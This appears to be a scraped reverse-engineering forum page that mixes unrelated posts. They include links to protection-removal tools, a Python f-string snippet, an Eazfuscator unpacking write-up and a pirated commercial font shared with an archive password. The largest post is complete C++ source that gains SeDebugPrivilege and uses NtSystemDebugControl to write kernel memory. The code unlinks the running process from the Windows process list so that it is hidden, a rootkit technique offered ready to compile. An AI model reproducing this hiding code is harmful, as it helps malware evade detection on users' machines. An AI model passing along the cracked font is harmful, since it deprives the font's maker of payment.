Leaderboard

StrongName tools: - added SamePKT tool - added 64 bits support for all tools StrongName2.rar

Reminds me old days: nelpats/DNGuard-InvalidMD: The easiest way to remove DNGuard Invalid-MD

Maybe you need to update your Python? Python 3.12.4 (tags/v3.12.4:8e8a4ba, Jun 6 2024, 19:30:16) [MSC v.1940 64 bit (AMD64)] on win32 Type "help", "copyright", "credits" or "license" for more information. >>> display_ids = ["first", "second", "third"] >>> print(f'Available audios:\n{"\n".join(f'{i:2}. {j}' for i, j in enumerate(display_ids, 1))}\n') Available audios: 1. first 2. second 3. third

Reverse Engineering Denuvo in Hogwarts Legacy Slides Sogen Emulator Source Ted.

Dear friends Berkeley Mono Font face is updated to version2. They included ligatures (nerd glyphs) directly in this build. The font face is 75$ for developer use only (no commercial use.) I have included this fontface so you can try them. Enjoy! Homepage hxxps://usgraphics[.]com/products/berkeley-mono Archive Pass: Download tx-02-berkeley-mono-pass=SCT.7z

2022.1 challenges was having only EAZFUSCATOR 2022.1 so after dealing with Strings, Cflow and Resources, VM was the main task. 2022.2 challenge was stacked (not actually but somehow) as the Sample was having ConfuserEx Anti-Dump so after applying EAZ over it, One of the EAZ calls got proxified. So If you are doing Static Unpacking, It probably would cause the issue but not in case of dynamic Unpacking. You can manually fix the proxified methods and can continue the process to unpacking it. I cleaned the Assembly after Unpacking and Devirting so It looks nice. You can guess Symbols from the assembly itself by modifying de4dot Renamer or can do manually. in Case of Stacking (depends on How EAZ is stacked), It is not advisable to clean Assembly as It may break other protectors unpacking. Regards CLQ EAZ_unp_2022.1_cleaned.exe BH_unp_2022.2_cleaned.exe

in no way is this my code at all: simply added/modify 2 lines to make it work correctly for Dev-C++ 1) LONG (NTAPI *NtSystemDebugControl)(int,void*,DWORD,void*,DWORD,DWORD*); 2) *(DWORD*)&NtSystemDebugControl =(DWORD)GetProcAddress(LoadLibrary("ntdll"),"NtSystemDebugControl"); #define WIN32_LEAN_AND_MEAN #include <windows.h> #include <stdio.h> #include <shlwapi.h> #include <iostream> using namespace std; typedef LONG NTSTATUS; #define STATUS_SUCCESS ((NTSTATUS)0x00000000L) //ivanlef0u's code //xp sp2 ntoskrnl 5.1.2600, les chiffre indiquent la taille de la struct à passer en argument typedef enum _DEBUG_CONTROL_CODE { DebugSysGetTraceInformation=1, DebugSysSetInternalBreakpoint, //0x38 DebugSysSetSpecialCall, //0x4 DebugSysClerSpecialCalls, //no args kill all special calls DebugSysQuerySpecialCalls, DebugSysBreakpointWithStatus, DebugSysGetVersion, //0x28 //sources de reactos écrit par notre alex ionescu préféré ntexapi.h DebugSysReadVirtual = 8, //0x10 DebugSysWriteVirtual = 9, DebugSysReadPhysical = 10, DebugSysWritePhysical = 11, DebugSysReadControlSpace=12, //0x18 DebugSysWriteControlSpace, //0x18 DebugSysReadIoSpace, //0x20 DebugSysSysWriteIoSpace, //0x20 DebugSysReadMsr, //0x10 DebugSysWriteMsr, //0x10 DebugSysReadBusData, //0x18 DebugSysWriteBusData, //0x18 DebugSysCheckLowMemory, } DEBUG_CONTROL_CODE; typedef struct _SYSDBG_VIRTUAL { PVOID Address; PVOID Buffer; ULONG Request; } SYSDBG_VIRTUAL, *PSYSDBG_VIRTUAL; extern "C" __declspec(dllimport) ULONG __stdcall RtlNtStatusToDosError( NTSTATUS Status ); #define PKPCR 0xffdff000 // <=> fs:[0] in KeLand //FUNCTIONS: LONG (NTAPI *NtSystemDebugControl)(int,void*,DWORD,void*,DWORD,DWORD*); //Check OS and get the right Offset: int CheckOSVersion( int &Offset ) { //xWeasel's Code for checking OS's and setting the right Offset OSVERSIONINFO osvi; ZeroMemory(&osvi, sizeof(OSVERSIONINFO)); osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO); GetVersionEx(&osvi); if(osvi.dwPlatformId == VER_PLATFORM_WIN32_NT && osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 1) { Offset = 0x88; //WinXP return 1; } else if(osvi.dwPlatformId == VER_PLATFORM_WIN32_NT && osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 0) { Offset = 0xA0; //Win2000 return 1; } else if(osvi.dwPlatformId == VER_PLATFORM_WIN32_NT && osvi.dwMajorVersion == 6 && osvi.dwMinorVersion == 0) { Offset = 0xA0; //VISTA return 1; } else { return 0; } return 0; } ULONG EnablePrivilege(char *Privilege) { HANDLE hToken; ULONG Ret=1; TOKEN_PRIVILEGES TP; LUID Luid; if(!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken)) { Ret=0; goto bye; } if(!LookupPrivilegeValue(NULL, Privilege, &TP.Privileges[0].Luid)) { Ret=0; goto bye; } TP.PrivilegeCount=1; TP.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED; if(!AdjustTokenPrivileges(hToken, false, &TP, NULL, NULL, NULL)) { Ret=0; goto bye; } bye: CloseHandle(hToken); return Ret; } int HideCurrentProcess( int Offset ) { *(DWORD*)&NtSystemDebugControl =(DWORD)GetProcAddress(LoadLibrary("ntdll"),"NtSystemDebugControl"); ULONG Status, Addr, PrevEPROCESS, NextEPROCESS; SYSDBG_VIRTUAL Mem; if(!EnablePrivilege("SeDebugPrivilege")) { return 0; } /**************** CURRENT ETHREAD ****************/ Mem.Address=(PVOID)(PKPCR+0x124); //KPRRCB-> +0x004 CurrentThread : Ptr32 _KTHREAD Mem.Buffer=&Addr; Mem.Request=sizeof(ULONG); Status=NtSystemDebugControl(DebugSysReadVirtual, &Mem , sizeof(SYSDBG_VIRTUAL), NULL, 0, NULL); if(Status!=STATUS_SUCCESS) { return 0; } /**************** CURRENT EPROCESS ****************/ Mem.Address=(PVOID)(Addr+0x220); //ETHREAD-> +0x220 ThreadsProcess : Ptr32 _EPROCESS Mem.Buffer=&Addr; Mem.Request=sizeof(ULONG); Status=NtSystemDebugControl(DebugSysReadVirtual, &Mem , sizeof(SYSDBG_VIRTUAL), NULL, 0, NULL); if(Status!=STATUS_SUCCESS) { return 0; } /**************** PREV EPROCESS ****************/ Mem.Address=(PVOID)(Addr+0x8C); //EPROCESS-> +0x088 ActiveProcessLinks : _LIST_ENTRY Mem.Buffer=&PrevEPROCESS; Mem.Request=sizeof(ULONG); Status=NtSystemDebugControl(DebugSysReadVirtual, &Mem , sizeof(SYSDBG_VIRTUAL), NULL, 0, NULL); if(Status!=STATUS_SUCCESS) { return 0; } /**************** NEXT EPROCESS ****************/ Mem.Address=(PVOID)(Addr+Offset); //EPROCESS-> +0x088 ActiveProcessLinks : _LIST_ENTRY Mem.Buffer=&NextEPROCESS; Mem.Request=sizeof(ULONG); Status=NtSystemDebugControl(DebugSysReadVirtual, &Mem , sizeof(SYSDBG_VIRTUAL), NULL, 0, NULL); if(Status!=STATUS_SUCCESS) { return 0; } /**************** PREV EPROCESS TO NEXT EPROCESS ****************/ Mem.Address=(PVOID)(PrevEPROCESS); //EPROCESS-> +0x088 ActiveProcessLinks : _LIST_ENTRY Mem.Buffer=&NextEPROCESS; Mem.Request=sizeof(ULONG); Status=NtSystemDebugControl(DebugSysWriteVirtual, &Mem , sizeof(SYSDBG_VIRTUAL), NULL, 0, NULL); if(Status!=STATUS_SUCCESS) { return 0; } /**************** NEXT EPROCESS TO PREV EPROCESS ****************/ Mem.Address=(PVOID)(NextEPROCESS+0x4); //EPROCESS-> +0x088 ActiveProcessLinks : _LIST_ENTRY Mem.Buffer=&PrevEPROCESS; Mem.Request=sizeof(ULONG); Status=NtSystemDebugControl(DebugSysWriteVirtual, &Mem , sizeof(SYSDBG_VIRTUAL), NULL, 0, NULL); if(Status!=STATUS_SUCCESS) { return 0; } return 1; //SUCCED Stuff is hidden!! } //MAIN FUNCTION int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { MessageBox(NULL,"Starting Main Function","Welcome",MB_OK);//DEBUG int Offset; if ( CheckOSVersion(Offset) == 1) { HideCurrentProcess(Offset);//OK to hide MessageBox(NULL,"Check if I'm hidden now!! Press OK to exit","FOUND!",MB_OK); //DEBUG } return 0; } the original idea was by a bad @ss hacker ivanlef0u http://www.ivanlef0u.tuxfamily.org/ --Currently works under SP3